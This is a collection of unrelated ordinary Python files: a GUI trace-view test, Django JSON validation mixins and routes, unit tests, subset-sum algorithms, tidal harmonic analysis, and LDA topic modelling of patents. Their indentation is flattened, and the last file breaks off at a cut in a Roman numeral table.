duration = 1.
st = np.linspace(0.1, .9, ns)
sc = artificial_spike_clusters(ns, nc)
traces = 10 * artificial_traces(int(round(duration * sr)), nc)
cs = ColorSelector()
m = Bunch(spike_times=st, spike_clusters=sc, sample_rate=sr)
s = Bunch(cluster_meta={}, selected=[0])
sw = _iter_spike_waveforms(interval=[0., 1.],
traces_interval=traces,
model=m,
supervisor=s,
n_samples_waveforms=ns,
get_best_channels=lambda cluster_id: ch,
color_selector=cs,
)
assert len(list(sw))
def get_traces(interval):
out = Bunch(data=select_traces(traces, interval, sample_rate=sr),
color=(.75,) * 4,
)
a, b = st.searchsorted(interval)
out.waveforms = []
k = 20
for i in range(a, b):
t = st[i]
c = sc[i]
s = int(round(t * sr))
d = Bunch(data=traces[s - k:s + k, :],
start_time=t - k / sr,
color=cs.get(c),
channel_ids=np.arange(5),
spike_id=i,
spike_cluster=c,
)
out.waveforms.append(d)
return out
v = TraceView(traces=get_traces,
n_channels=nc,
sample_rate=sr,
duration=duration,
channel_vertical_order=np.arange(nc)[::-1],
)
gui = GUI(config_dir=tempdir)
gui.show()
v.attach(gui)
qtbot.addWidget(gui)
# qtbot.waitForWindowShown(gui)
v.on_select([])
v.on_select([0])
v.on_select([0, 2, 3])
v.on_select([0, 2])
# ac(v.stacked.box_size, (1., .08181), atol=1e-3)
v.set_interval((.375, .625))
assert v.time == .5
v.go_to(.25)
assert v.time == .25
v.go_to(-.5)
assert v.time == .125
v.go_left()
assert v.time == .125
v.go_right()
assert v.time == .175
# Change interval size.
v.interval = (.25, .75)
ac(v.interval, (.25, .75))
v.widen()
ac(v.interval, (.125, .875))
v.narrow()
ac(v.interval, (.25, .75))
# Widen the max interval.
v.set_interval((0, duration))
v.widen()
v.toggle_show_labels()
# v.toggle_show_labels()
v.go_right()
assert v.do_show_labels
# Change channel scaling.
bs = v.stacked.box_size
v.increase()
v.decrease()
ac(v.stacked.box_size, bs, atol=1e-3)
v.origin = 'upper'
assert v.origin == 'upper'
# Simulate spike selection.
_clicked = []
@v.gui.connect_
def on_spike_click(channel_id=None, spike_id=None, cluster_id=None):
_clicked.append((channel_id, spike_id, cluster_id))
v.events.key_press(key=keys.Key('Control'))
v.events.mouse_press(pos=(400., 200.), button=1, modifiers=(keys.CONTROL,))
v.events.key_release(key=keys.Key('Control'))
assert _clicked == [(1, 4, 1)]
# qtbot.stop()
gui.close()
|
from jsonschema import Draft4Validator, Draft3Validator
from jsonschema.validators import validator_for
from .http.response import JsonResponseBadRequest
class JsonFormMixin(object):
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
if self.request.method in ('POST', 'PUT', 'PATCH') and not self.request.POST \
and hasattr(self.request, 'json') and self.request.json:
kwargs['data'] = self.request.json
return kwargs
def form_invalid(self, form):
errors = {
field: [error for data in error_list.data for error in data]
for field, error_list in form.errors.items()
}
return JsonResponseBadRequest({'errors': errors})
class JsonSchemaPayloadMixin(object):
request_schema = {}
def dispatch(self, request, *args, **kwargs):
"""
:param django.core.handlers.wsgi.WSGIRequest request:
:param args:
:param kwargs:
:return:
"""
if request.method in ('POST', 'PUT', 'PATCH'):
if self.request_schema:
validator_cls = validator_for(self.request_schema)
validator = validator_cls(self.request_schema) # type: Draft4Validator or Draft3Validator
errors = [str(error) for error in validator.iter_errors(request.json)]
if errors:
return JsonResponseBadRequest({'errors': errors})
return super().dispatch(request, *args, **kwargs)
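# Minimal usage sketch (hypothetical view; assumes middleware has attached the parsed
# JSON body as request.json, which both mixins above rely on):
#
#   class PhotoCreateView(JsonSchemaPayloadMixin, JsonFormMixin, CreateView):
#       request_schema = {
#           "type": "object",
#           "required": ["title"],
#           "properties": {"title": {"type": "string"}},
#       }
#
# Payloads that fail the schema are rejected with JsonResponseBadRequest before the
# form is ever constructed.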
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# -*- coding: utf-8 -*-
"""Test lvmmodel.install.
"""
from os.path import abspath, dirname
import unittest
from .. import __version__ as lvmmodel_version
from ..install import default_install_dir, svn_export, install
class TestInstall(unittest.TestCase):
"""Test lvmmodel.install.
"""
def test_default_install_dir(self):
"""Test setting default install directory.
"""
d1 = default_install_dir()
d2 = dirname(dirname(dirname(dirname(dirname(dirname(__file__))))))
self.assertEqual(abspath(d1), abspath(d2))
def test_svn_export(self):
"""Test svn export command.
"""
base_url = "https://desi.lbl.gov/svn/code/lvmmodel/{0}/data"
cmd = svn_export()
self.assertEqual(cmd[2], base_url.format('trunk'))
cmd = svn_export('trunk')
self.assertEqual(cmd[2], base_url.format('trunk'))
cmd = svn_export('branches/v3')
self.assertEqual(cmd[2], base_url.format('branches/v3'))
cmd = svn_export('1.2.3')
self.assertEqual(cmd[2], base_url.format('tags/1.2.3'))
def test_install(self):
"""Test the install function.
"""
pass
def test_suite():
"""Allows testing of only this module with the command::
python setup.py test -m <modulename>
"""
return unittest.defaultTestLoader.loadTestsFromName(__name__)
|
"""
Helpers for evaluating models.
"""
from .reptile import ReptileForFederatedData
from mlmi.reptile.reptile_original.variables import weight_decay
# pylint: disable=R0913,R0914
def evaluate(sess,
model,
train_dataloaders,
test_dataloaders,
num_classes=5,
eval_inner_iters=50,
transductive=False,
weight_decay_rate=1,
reptile_fn=ReptileForFederatedData):
"""
    Evaluate a model on paired train/test dataloaders and return the mean per-task accuracy.
"""
reptile = reptile_fn(
session=sess,
transductive=transductive,
pre_step_op=weight_decay(weight_decay_rate)
)
total_correct = 0
for train_dl, test_dl in zip(
train_dataloaders.values(), test_dataloaders.values()
):
total_correct += reptile.evaluate(
train_data_loader=train_dl,
test_data_loader=test_dl,
input_ph=model.input_ph,
label_ph=model.label_ph,
minimize_op=model.minimize_op,
predictions=model.predictions,
inner_iters=eval_inner_iters
)
return total_correct / (len(train_dataloaders) * num_classes)
|
"""
Given positive integers {x_1, ..., x_n}, is there a subset that sums to k?
This is an NP-complete problem.
Links:
https://en.wikipedia.org/wiki/Subset_sum_problem
https://stackoverflow.com/a/45427013/9518712
https://cs.stackexchange.com/a/49632
https://github.com/saltycrane/subset-sum
https://stackoverflow.com/a/41570549/9518712
"""
from itertools import chain, combinations
def subset_naive(arr, k: int):
"""sum all subsets
Time complexity: O(n2^n)
"""
powerset = chain.from_iterable(combinations(arr, i) for i in range(1, len(arr) + 1))
return any(sum(subset) == k for subset in powerset)
def subset_pseudopoly(arr, k: int) -> bool:
"""
Pseudo polynomial time using dynamic programming
Time complexity: O(nk)
"""
possible = [False] * (k + 1)
possible[0] = True
for elem in arr:
for i in range(k - elem, -1, -1):
if possible[i]:
possible[i + elem] = True
return possible[k]
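# Illustrative trace of the DP array for the test case arr = [1, 2, 3, 1], k = 4:
#   start:    reachable sums {0}
#   after 1:  {0, 1}
#   after 2:  {0, 1, 2, 3}
#   after 3:  {0, 1, 2, 3, 4}   <- possible[4] becomes True
#   after 1:  unchanged
# so subset_pseudopoly([1, 2, 3, 1], 4) returns True, matching the tests below.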
# def subset_approx(arr, k, err=0.01):
# """
# The algorithm is polynomial time because the lists S, T and U always remain of
# size polynomial in N and 1/c and, as long as they are of polynomial size,
# all operations on them can be done in polynomial time.
# """
# s = [0]
# for x in arr:
# t = [x + y for y in s]
# u = t + s
# u = sorted(u)
# y = u[0] # min value of u
# s = [y]
# for z in u:
# if y + err * k / len(arr) < z <= k:
# y = z
# s.append(z)
# for x in s:
# if (1 - err) * k <= x <= k:
# return True
# return False
def test():
"""run test cases"""
test_cases = (
([], 1, False),
([1], 1, True),
([1, 2, 3, 1], 4, True),
([4, 2, 3, 4], 8, True),
([2, 7, 9], 12, False),
([267, 961, 1153, 1000, 1922, 493, 1598, 869, 1766, 1246], 5842, True),
)
for *arg, expected in test_cases:
assert subset_naive(*arg) == expected
assert subset_pseudopoly(*arg) == expected
# assert subset_approx(*arg) == expected
if __name__ == "__main__":
test()
|
from __future__ import division
import numpy as np
import pandas as pd
import netCDF4 as nc
from datetime import datetime, timedelta
import cPickle as pickle
import sys
sys.path.append('/home/wesley/github/UTide/')
from utide import ut_solv
import scipy.io as sio
from stationClass import station
def mjd2num(x):
y = x + 678942
return y
def closest_point(points, lon, lat):
point_list = np.array([lon,lat]).T
closest_dist = ((point_list[:, 0] - points[:, 0, None])**2 +
(point_list[:, 1] - points[:, 1, None])**2)
closest_point_indexes = np.argmin(closest_dist, axis=1)
return closest_point_indexes
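# Illustrative (made-up numbers): for points = np.array([[0., 0.], [1., 1.]]),
# lon = np.array([0.1, 0.9]) and lat = np.array([0.1, 0.9]), closest_point returns
# array([0, 1]), i.e. the index of the nearest (lon, lat) node for each query point.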
def datetime2matlabdn(dt):
# ordinal = dt.toordinal()
mdn = dt + timedelta(days=366)
frac = (dt-datetime(dt.year, dt.month, dt.day, 0, 0, 0)).seconds / \
(24.0 * 60.0 * 60.0)
return mdn.toordinal() + frac
def tideGauge(datafiles, Struct):
dgFilename = '/array/home/rkarsten/common_tidal_files/data/observed/DG/TideGauge/DigbyWharf_015893_20140115_2221_Z.mat'
gpFilename = '/array/home/rkarsten/common_tidal_files/data/observed/GP/TideGauge/Westport_015892_20140325_1212_Z.mat'
dgtg = sio.loadmat(dgFilename, struct_as_record=False, squeeze_me=True)
gptg = sio.loadmat(gpFilename, struct_as_record=False, squeeze_me=True)
ut_constits = ['M2','S2','N2','K2','K1','O1','P1','Q1']
print 'Westport TideGauge'
coef_gptg = ut_solv(gptg['RBR'].date_num_Z,
(gptg['RBR'].data-np.mean(gptg['RBR'].data)), [],
gptg['RBR'].lat, cnstit=ut_constits, notrend=True,
rmin=0.95, method='ols', nodiagn=True, linci=True,
ordercnstit='frq')
print 'DigbyWharf TideGauge'
coef_dgtg = ut_solv(dgtg['RBR'].date_num_Z,
(dgtg['RBR'].data-np.mean(dgtg['RBR'].data)), [],
dgtg['RBR'].lat, cnstit=ut_constits, notrend=True,
rmin=0.95, method='ols', nodiagn=True, linci=True,
ordercnstit='frq')
struct = np.array([])
for filename in datafiles:
print filename
data = nc.Dataset(filename, 'r')
lat = data.variables['lat'][:]
lon = data.variables['lon'][:]
time = data.variables['time'][:]
time = mjd2num(time)
tg_gp_id = np.argmin(np.sqrt((lon-gptg['RBR'].lon)**2+(lat-gptg['RBR'].lat)**2))
tg_dg_id = np.argmin(np.sqrt((lon-dgtg['RBR'].lon)**2+(lat-dgtg['RBR'].lat)**2))
#elgp = data.variables['zeta'][tg_gp_id, :]
#eldg = data.variables['zeta'][tg_dg_id, :]
elgp = data.variables['zeta'][:, tg_gp_id]
eldg = data.variables['zeta'][:, tg_dg_id]
coef_dg = ut_solv(time, eldg, [], dgtg['RBR'].lat, cnstit=ut_constits,
notrend=True, rmin=0.95, method='ols', nodiagn=True,
linci=True, ordercnstit='frq')
coef_gp = ut_solv(time, elgp, [], gptg['RBR'].lat, cnstit=ut_constits,
notrend=True, rmin=0.95, method='ols', nodiagn=True,
linci=True, ordercnstit='frq')
Name = filename.split('/')[-3]
Name = '2012_run'
print Name
obs_loc = {'name':Name, 'type':'TideGauge',
'mod_time':time, 'dg_time':dgtg['RBR'].date_num_Z,
'gp_time':gptg['RBR'].date_num_Z,
'lon':lon, 'lat':lat,
'dg_tidegauge_harmonics': coef_dgtg,
'gp_tidegauge_harmonics':coef_gptg,
'dg_mod_harmonics': coef_dg,
'gp_mod_harmonics': coef_gp,
'dg_tg_data':dgtg['RBR'].data,
'gp_tg_data':gptg['RBR'].data,
'eldg':eldg, 'elgp':elgp}
struct = np.hstack((struct, obs_loc))
Struct[Name] = np.hstack((Struct[Name], struct))
#pickle.dump(struct, open("structADCP.p", "wb"))
return Struct
def adcp(datafiles, debug=False):
if debug:
adcpFilename = '/home/wesley/github/karsten/adcp/testADCP.txt'
else:
adcpFilename = '/array/home/107002b/github/karsten/adcp/acadia_dngrid_adcp_2012.txt'
#adcpFilename = '/home/wesleyb/github/karsten/adcp/dngrid_adcp_2012.txt'
adcp = pd.read_csv(adcpFilename)
for i,v in enumerate(adcp['Latitude']):
path = adcp.iloc[i, -1]
if path != 'None':
print adcp.iloc[i, 0]
#print lonlat[i,1], uvnodell[ii,1]
ADCP = pd.read_csv(path, index_col=0)
ADCP.index = pd.to_datetime(ADCP.index)
adcpTime = np.empty(ADCP.index.shape)
for j, jj in enumerate(ADCP.index):
adcpTime[j] = datetime2matlabdn(jj)
adcpCoef = ut_solv(adcpTime, ADCP['u'].values,
ADCP['v'].values, v,
cnstit='auto', rmin=0.95, notrend=True,
method='ols', nodiagn=True, linci=True,
conf_int=True)
adcpData = adcpCoef
obs = pd.DataFrame({'u':ADCP['u'].values, 'v':ADCP['v'].values})
Struct = {}
for filename in datafiles:
print filename
data = nc.Dataset(filename, 'r')
#x = data.variables['x'][:]
#y = data.variables['y'][:]
lon = data.variables['lon'][:]
lat = data.variables['lat'][:]
lonc = data.variables['lonc'][:]
latc = data.variables['latc'][:]
ua = data.variables['ua']
va = data.variables['va']
time = data.variables['time'][:]
#trinodes = data.variables['nv'][:]
time = mjd2num(time)
lonlat = np.array([adcp['Longitude'], adcp['Latitude']]).T
#index = closest_point(lonlat, lon, lat)
index = closest_point(lonlat, lonc, latc)
adcpData = pd.DataFrame()
runData = pd.DataFrame()
Name = filename.split('/')[-3]
Name = '2012_run'
print Name
struct = np.array([])
for i, ii in enumerate(index):
path = adcp.iloc[i, -1]
if path != 'None':
print adcp.iloc[i, 0]
coef = ut_solv(time, ua[:, ii], va[:, ii], lonlat[i, 1],
cnstit='auto', rmin=0.95, notrend=True,
method='ols', nodiagn=True, linci=True,
conf_int=True)
runData = coef
mod = pd.DataFrame({'ua':ua[:, ii], 'va':va[:, ii]})
obs_loc = {'name':adcp.iloc[i,0], 'type':'ADCP', 'lat':lonlat[i,-1],
'lon':lonlat[0,0], 'obs_timeseries':obs,
'mod_timeseries':mod, 'obs_time':adcpTime,
'mod_time':time,'speed_obs_harmonics':adcpData,
'speed_mod_harmonics':runData}
struct = np.hstack((struct, obs_loc))
Struct[Name] = struct
return Struct
def main(debug=False):
if debug:
datafiles = ['/array/data1/rkarsten/dncoarse_bctest_old/output/dn_coarse_0001.nc',
'/array/data1/rkarsten/dncoarse_bctest/output/dn_coarse_0001.nc']
#datafiles = ['/home/wesley/ncfiles/smallcape_force_0001.nc']
else:
# datafiles = ['/array/data1/rkarsten/dncoarse_bctest_old/output/dn_coarse_0001.nc',
# '/array/data1/rkarsten/dncoarse_bctest/output/dn_coarse_0001.nc',
# '/array/data1/rkarsten/dncoarse_bctest2/output/dn_coarse_0001.nc',
# '/array/data1/rkarsten/dncoarse_bctest_all/output/dn_coarse_0001.nc',
# '/array/data1/rkarsten/dncoarse_bctest_EC/output/dn_coarse_0001.nc',
# '/array/data1/rkarsten/dncoarse_bctest_timeseries/output/dn_coarse_0001.nc']
#datafiles = ['/array2/data3/rkarsten/dncoarse_3D/output2/dn_coarse_station_timeseries.nc']
# datafiles = ['/EcoII/EcoEII_server_data_tree/data/simulated/FVCOM/dncoarse/calibration/bottom_roughness/0.0015/output/dngrid_0001.nc',
# '/EcoII/EcoEII_server_data_tree/data/simulated/FVCOM/dncoarse/calibration/bottom_roughness/0.0020/output/dngrid_0001.nc',
# '/EcoII/EcoEII_server_data_tree/data/simulated/FVCOM/dncoarse/calibration/bottom_roughness/0.0025/output/dngrid_0001.nc',
# '/EcoII/EcoEII_server_data_tree/data/simulated/FVCOM/dncoarse/calibration/bottom_roughness/0.0030/output/dngrid_0001.nc']
#
datafiles = ['/array/home/116822s/2012_run.nc']
#'/array/data1/rkarsten/dncoarse_stationtest/output/dn_coarse_0001.nc']
saveName = 'struct2012_run.p'
Struct = adcp(datafiles, debug=False)
if debug:
pickle.dump(Struct, open("structADCP.p", "wb"))
Struct = tideGauge(datafiles, Struct)
pickle.dump(Struct, open(saveName, "wb"))
return Struct
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 18 11:49:00 2021
@author: tmlab
"""
#%% 01. package and data load
if __name__ == '__main__':
import pickle
import spacy
import re
from nltk.corpus import stopwords
import pandas as pd
import numpy as np
from gensim.models import CoherenceModel
from gensim.corpora import Dictionary
from gensim.models.ldamulticore import LdaMulticore
import warnings
from sentence_transformers import SentenceTransformer
from collections import Counter
import xlsxwriter
directory = 'D:/OneDrive - 아주대학교/db/patent/'
with open(directory + 'DT_211118.pkl', 'rb') as fr :
data = pickle.load(fr)
# data_sample = data.sample(500, random_state = 12345).reset_index(drop = 1)
data_sample = data
data_sample['TAC'] = data_sample['title'] + ' ' + data_sample['abstract'] + ' ' + data_sample['claims_rep']
data_sample['year'] = data_sample['date'].apply(lambda x : x[0:4])
# data_sample.
#%% 02. preprocessing and filtering
c = Counter(data_sample['year']) #2016 ~ 2020
year_list = [k for k,v in c.items() if v >= 30]
stopwords_nltk = set(stopwords.words('english'))
data_sample = data_sample.loc[data_sample['year'] >=min(year_list) , :].reset_index(drop = 1)
data_sample = data_sample.loc[data_sample['TAC'].str.split().str.len() >= 100 , :].reset_index(drop = 1)
nlp = spacy.load("en_core_web_sm")
directory = 'D:/OneDrive - 아주대학교/db/dictionary/'
with open(directory + 'stopwords_uspto.txt') as f:
stopwords_uspto = [line.rstrip() for line in f]
stopwords_uspto.append('-PRON-')
data_sample['TAC_nlp'] = [nlp(i) for i in data_sample['TAC']]
# get keyword
data_sample['TAC_keyword'] = [[token.lemma_ for token in doc] for doc in data_sample['TAC_nlp']] # lemma
    data_sample['TAC_keyword'] = [[token for token in doc if len(token) > 2] for doc in data_sample['TAC_keyword']] # drop short tokens
    data_sample['TAC_keyword'] = [[token for token in doc if not token.isdigit() ] for doc in data_sample['TAC_keyword']] # drop pure digits
    data_sample['TAC_keyword'] = [[re.sub(r"[^a-zA-Z0-9-]","",token) for token in doc ] for doc in data_sample['TAC_keyword']] # strip special characters
    data_sample['TAC_keyword'] = [[token for token in doc if len(token) > 2] for doc in data_sample['TAC_keyword']] # drop short tokens again after stripping
    data_sample['TAC_keyword'] = [[token for token in doc if token not in stopwords_uspto] for doc in data_sample['TAC_keyword']] # drop USPTO stopwords
    data_sample['TAC_keyword'] = [[token for token in doc if token not in stopwords_nltk] for doc in data_sample['TAC_keyword']] # drop NLTK stopwords
data_sample['cpc_class'] = ''
data_sample['cpc_subclass'] = ''
data_sample['cpc_group'] = ''
for idx,row in data_sample.iterrows() :
print(idx)
cpc_list = data_sample['cpc_list'][idx]
data_sample['cpc_group'][idx] = [i for i in cpc_list if len(i) > 5]
data_sample['cpc_class'][idx] = [i for i in cpc_list if len(i) == 3]
data_sample['cpc_subclass'][idx] = [i for i in cpc_list if len(i) == 4]
#%% 03. filtering text and cpc
directory = 'D:/OneDrive - 아주대학교/db/patent/CPC/'
with open(directory + 'CPC_definition.pkl', 'rb') as fr:
CPC_definition = pickle.load(fr)
def get_CPC_Counter(df,col) :
cpc_list = df[col].tolist()
cpc_list = sum(cpc_list, [])
c = Counter(cpc_list)
# c = {k: v for k, v in sorted(c.items(), key=lambda item: item[1], reverse=True)}
return(c)
cpc_class = get_CPC_Counter(data_sample, 'cpc_class')
cpc_subclass = get_CPC_Counter(data_sample,'cpc_subclass')
cpc_group = get_CPC_Counter(data_sample,'cpc_group')
class_list = [k for k,v in cpc_class.items() if v >= len(data_sample) * 0.05]
class_list = [i for i in class_list if i in CPC_definition.keys()]
subclass_list = [k for k,v in cpc_subclass.items() if v >= len(data_sample) * 0.025]
subclass_list = [i for i in subclass_list if i[0:-1] in class_list]
subclass_list = [i for i in subclass_list if i in CPC_definition.keys()]
group_list = [k for k,v in cpc_group.items() if v >= len(data_sample) * 0.0125]
group_list = [i for i in group_list if i[0:4] in subclass_list]
group_list = [i for i in group_list if i in CPC_definition.keys()]
#%% 04. encoding cpc and keyword
# conda install -c conda-forge ipywidgets
model = SentenceTransformer('sentence-transformers/multi-qa-mpnet-base-dot-v1')
result_df = pd.DataFrame()
def cosine(u, v):
return np.dot(u, v) / (np.linalg.norm(u) * np.linalg.norm(v))
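    # e.g. (illustrative) cosine(np.array([1., 0.]), np.array([1., 1.])) == 1 / np.sqrt(2) ~= 0.707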
encoded_CPC = {}
for i in subclass_list :
encoded_CPC[i] = model.encode(CPC_definition[i])
for i in class_list :
encoded_CPC[i] = model.encode(CPC_definition[i])
for i in group_list :
encoded_CPC[i] = model.encode(CPC_definition[i])
with open(directory + 'input/encoded_CPC.pkl', 'wb') as fw:
pickle.dump(encoded_CPC, fw)
# with open(directory + 'input/encoded_CPC.pkl', 'rb') as fr:
# encoded_CPC = pickle.load(fr)
#%%
texts = data_sample['TAC_keyword']
dct = Dictionary(texts)
dct.filter_extremes(no_below = 10,
no_above=0.1)
keyword_list = dct.token2id.keys()
text_list = keyword_list
standard = {}
encoded_text = {}
level = 1
for CPC in [class_list, subclass_list, group_list] :
total_df = pd.DataFrame()
for text in text_list :
if text in encoded_text.keys() :
text_embedding = encoded_text[text]
else :
text_embedding = model.encode(text)
encoded_text[text] = text_embedding
sim_list = []
for cpc_text in CPC :
cpc_embedding = encoded_CPC[cpc_text]
sim = cosine(text_embedding, cpc_embedding)
sim_list.append(sim)
mean = np.mean(sim_list)
var = np.var(sim_list)
total_df = total_df.append([[mean,var]], ignore_index=1)
total_df.columns = ['MEAN' , 'VAR']
MEAN = np.mean(total_df['MEAN'])
VAR = np.mean(total_df['VAR'])
standard[level] = (MEAN, VAR)
level +=1
#%% 05. classify keyword
level = 1
text_classification_df = pd.DataFrame()
for CPC in [class_list, subclass_list, group_list] :
MEAN = standard[level][0]
VAR = standard[level][1]
SD = np.sqrt(VAR)
result = {}
for text in keyword_list :
# CPC = class_list
if text in result.keys() :
continue
else :
text_embedding = encoded_text[text]
sim_list = []
for cpc_text in CPC :
cpc_embedding = encoded_CPC[cpc_text]
sim = cosine(text_embedding, cpc_embedding)
sim_list.append(sim)
mean = np.mean(sim_list)
var = np.var(sim_list)
if (mean >= MEAN) & (var >= VAR) :
result[text] = 'DEFINED_SEPERATED'
elif (mean >= MEAN) & (var < VAR) :
result[text] = 'DEFINED'
else :
result[text] = 'UNCLASSIFIED'
level +=1
text_classification_df = text_classification_df.append(result, ignore_index=1 )
text_classification_df = text_classification_df.transpose()
text_classification_df.columns = ['class', 'subclass', 'group']
#%% 06. LDA tunning
warnings.filterwarnings('ignore')
# dct = Dictionary(texts)
# dct.filter_extremes(no_below = 10,
# no_above=0.1)
corpus = [dct.doc2bow(text) for text in texts]
def compute_coherence_values(corpus, dictionary, texts, k, a, b):
lda_model = LdaMulticore(corpus=corpus,
id2word=dictionary,
num_topics=k,
random_state=100,
chunksize=100,
passes=10,
alpha=a,
eta=b,
workers=15,
)
coherence_model_lda = CoherenceModel(model=lda_model,
texts=texts,
dictionary=dictionary,
coherence='u_mass')
return coherence_model_lda.get_coherence()
grid = {}
grid['Validation_Set'] = {}
    # Topics range (revise as needed)
min_topics = 10
max_topics = 51
step_size = 5
topics_range = range(min_topics, max_topics, step_size)
# Alpha parameter
alpha = list(np.arange(0.01, 1, 0.3))
# alpha = [0.01, 0.05, 0.1, 1]
alpha.append('symmetric')
alpha.append('asymmetric')
# Beta parameter
beta = list(np.arange(0.01, 1, 0.3))
# beta = [0.01, 0.05, 0.1, 1]
beta.append('symmetric')
# Validation sets
num_of_docs = len(corpus)
corpus_sets = [# gensim.utils.ClippedCorpus(corpus, num_of_docs*0.25),
# gensim.utils.ClippedCorpus(corpus, num_of_docs*0.5),
# gensim.utils.ClippedCorpus(corpus, num_of_docs*0.75),
corpus]
corpus_title = ['100% Corpus']
model_results = {'Validation_Set': [],
'Topics': [],
'Alpha': [],
'Beta': [],
'Coherence': []
}
# Can take a long time to run
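    # With the ranges above this is 9 topic counts x 6 alphas x 5 betas = 270 LdaMulticore fits.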
if 1 == 1:
cnt = 0
# iterate through validation corpuses
for i in range(len(corpus_sets)):
# iterate through number of topics
for k in topics_range:
# iterate through alpha values
for a in alpha:
# iterare through beta values
for b in beta:
# get the coherence score for the given parameters
cv = compute_coherence_values(corpus=corpus_sets[i],
dictionary=dct,
texts = texts,
k=k,
a=a,
b=b)
# Save the model results
model_results['Validation_Set'].append(corpus_title[i])
model_results['Topics'].append(k)
model_results['Alpha'].append(a)
model_results['Beta'].append(b)
model_results['Coherence'].append(cv)
cnt +=1
print("전체 {} 중에서 {} ".format(len(alpha) *len(beta) *len(topics_range),cnt))
pd.DataFrame(model_results).to_csv(directory + 'lda_tuning_results.csv', index=False)
    #%% 07. LDA result handling (revise hyperparameters as needed)
lda_model = LdaMulticore(corpus=corpus,
id2word=dct,
num_topics= 50,
random_state=100,
chunksize=100,
passes=10,
alpha=0.91,
eta=0.91,
workers=15
)
#%% 08. calculate freshness
topic_word_df = pd.DataFrame()
for i in range(0, lda_model.num_topics) :
temp = lda_model.show_topic(i, 1000)
DICT = {}
for tup in temp :
DICT[tup[0]] = tup[1]
topic_word_df = topic_word_df.append(DICT, ignore_index =1)
topic_word_df = topic_word_df.transpose()
# freshness
topic_fresh_dict = dict.fromkeys(range(0,50), 0)
for idx, row in topic_word_df.iterrows() :
temp = text_classification_df.loc[[row.name]].iloc[0,:].tolist()
if all(i== 'UNCLASSIFIED' for i in temp ) :
for col in topic_word_df.columns :
prob = row[col]
if str(prob) != 'nan' :
topic_fresh_dict[col] += prob
topic_fresh_df = pd.DataFrame(topic_fresh_dict.items())
topic_fresh_df.columns = ['topic', 'prob']
    #%% 09. calculate volume & CAGR
topic_doc_df = pd.DataFrame(columns = range(0, lda_model.num_topics))
for corp in corpus :
temp = lda_model.get_document_topics(corp)
DICT = {}
for tup in temp :
DICT[tup[0]] = tup[1]
topic_doc_df = topic_doc_df.append(DICT, ignore_index=1)
volumn_df = topic_doc_df.apply(np.sum)
#%% get CAGR
topic_doc_df['year'] = data_sample['year']
topic_doc_df['title'] = data_sample['title']
#%%
topic_year_df = pd.DataFrame()
for col in range(0, lda_model.num_topics) :
grouped = topic_doc_df[col].groupby(topic_doc_df['year'])
DICT = grouped.sum()
topic_year_df = topic_year_df.append(DICT, ignore_index=1)
topic_year_df = topic_year_df.transpose()
#%% saving result
import xlsxwriter
# directory = 'C:/Users/tmlab/Desktop/작업공간/'
writer = pd.ExcelWriter(directory + 'LDA_results.xlsx',
engine='xlsxwriter')
topic_word_df.to_excel(writer , sheet_name = 'topic_word', index = 1)
topic_fresh_df.to_excel(writer , sheet_name = 'topic_fresh', index = 1)
topic_doc_df.to_excel(writer , sheet_name = 'topic_doc', index = 1)
volumn_df.to_excel(writer , sheet_name = 'volumn', index = 1)
    topic_year_df.to_excel(writer , sheet_name = 'volumn_year', index = 1)
writer.save()
writer.close()
    #%% Application 1
topics = lda_model.show_topic(26)
for topic in topics:
print(topic)
    #%% Application 2
for idx, topic_list in enumerate(lda_model[corpus]):
# if idx==5: break
        print(idx, '-th document topic proportions:', topic_list)
    #%% Application 3 https://wikidocs.net/30708
def make_topictable_per_doc(ldamodel, corpus):
topic_table = pd.DataFrame()
        # Pull out each document's number and its topic proportions, one row at a time.
for i, topic_list in enumerate(ldamodel[corpus]):
doc = topic_list[0] if ldamodel.per_word_topics else topic_list
doc = sorted(doc, key=lambda x: (x[1]), reverse=True)
            # Sort each document's topics in descending order of proportion.
            # e.g. document 0 before sorting: (topic 2, 48.5%), (topic 8, 25%), (topic 10, 5%), (topic 12, 21.5%)
            # e.g. document 0 after sorting:  (topic 2, 48.5%), (topic 8, 25%), (topic 12, 21.5%), (topic 10, 5%)
            # i.e. sorted as 48 > 25 > 21 > 5.
            # Do the following for every document.
            for j, (topic_num, prop_topic) in enumerate(doc): # split off the topic number and its proportion
                if j == 0: # the list is sorted, so the first entry is the dominant topic
topic_table = topic_table.append(pd.Series([int(topic_num), round(prop_topic,4), topic_list]), ignore_index=True)
                    # store the dominant topic, its proportion, and the full topic distribution
else:
break
return(topic_table)
topictable = make_topictable_per_doc(lda_model, corpus)
    topictable = topictable.reset_index() # add an extra index column to serve as the document number
    topictable.columns = ['document number', 'dominant topic', 'dominant topic weight', 'topic distribution']
topictable[:10]
topictable.to_csv(directory + 'topictable.csv', index = 0 , encoding = "euc-kr")
#%% 응용 4
import pyLDAvis
import pyLDAvis.gensim_models as gensimvis
pyLDAvis.enable_notebook()
# feed the LDA model into the pyLDAvis instance
lda_viz = gensimvis.prepare(lda_model, corpus, dct)
pyLDAvis.save_html(lda_viz, directory + 'lda_viz.html') |
import setuptools
# with open("README.md", "r") as fh:
# long_description = fh.read()
def find_packages_with_dir(src_base, exclude):
"""Find packages under the given base directory and append their paths.
"""
pkgs = setuptools.find_packages(src_base, exclude)
return {pkg: src_base + '/' + pkg.replace('.', '/') for pkg in pkgs}
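# Illustrative (assumed layout): with src/python/chern/__init__.py present,
# find_packages_with_dir('src/python', exclude=[]) returns {'chern': 'src/python/chern'},
# which feeds the packages/package_dir arguments below.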
pkgs_dir = find_packages_with_dir('src/python', exclude=[])
setuptools.setup(
name="chern",
version="0.2",
author="Ning Sun",
author_email="[email protected]",
description="Chern number calculator for 2D materials",
# long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/atom-sun/chern.git",
# packages=setuptools.find_packages(),
packages=pkgs_dir.keys(),
package_dir=pkgs_dir,
)
|
from django.conf.urls import url, include
from rest_framework_nested import routers
from core.views import PhotoViewSet, UserViewSet
router = routers.DefaultRouter()
router.register(r'photos', PhotoViewSet)
router.register(r'users', UserViewSet)
users_router = routers.NestedSimpleRouter(router, r'users', lookup='user')
users_router.register(r'photos', PhotoViewSet, base_name='user-photos')
urlpatterns = [
url(r'^', include(router.urls)),
url(r'^', include(users_router.urls)),
]
|
rnl = [ { '4' : 'MMMM', '3' : 'MMM', '2' : 'MM', '1' : 'M', '0' : '' }, { '9' : 'CM', '8' : 'DCCC', '7' : 'DCC',
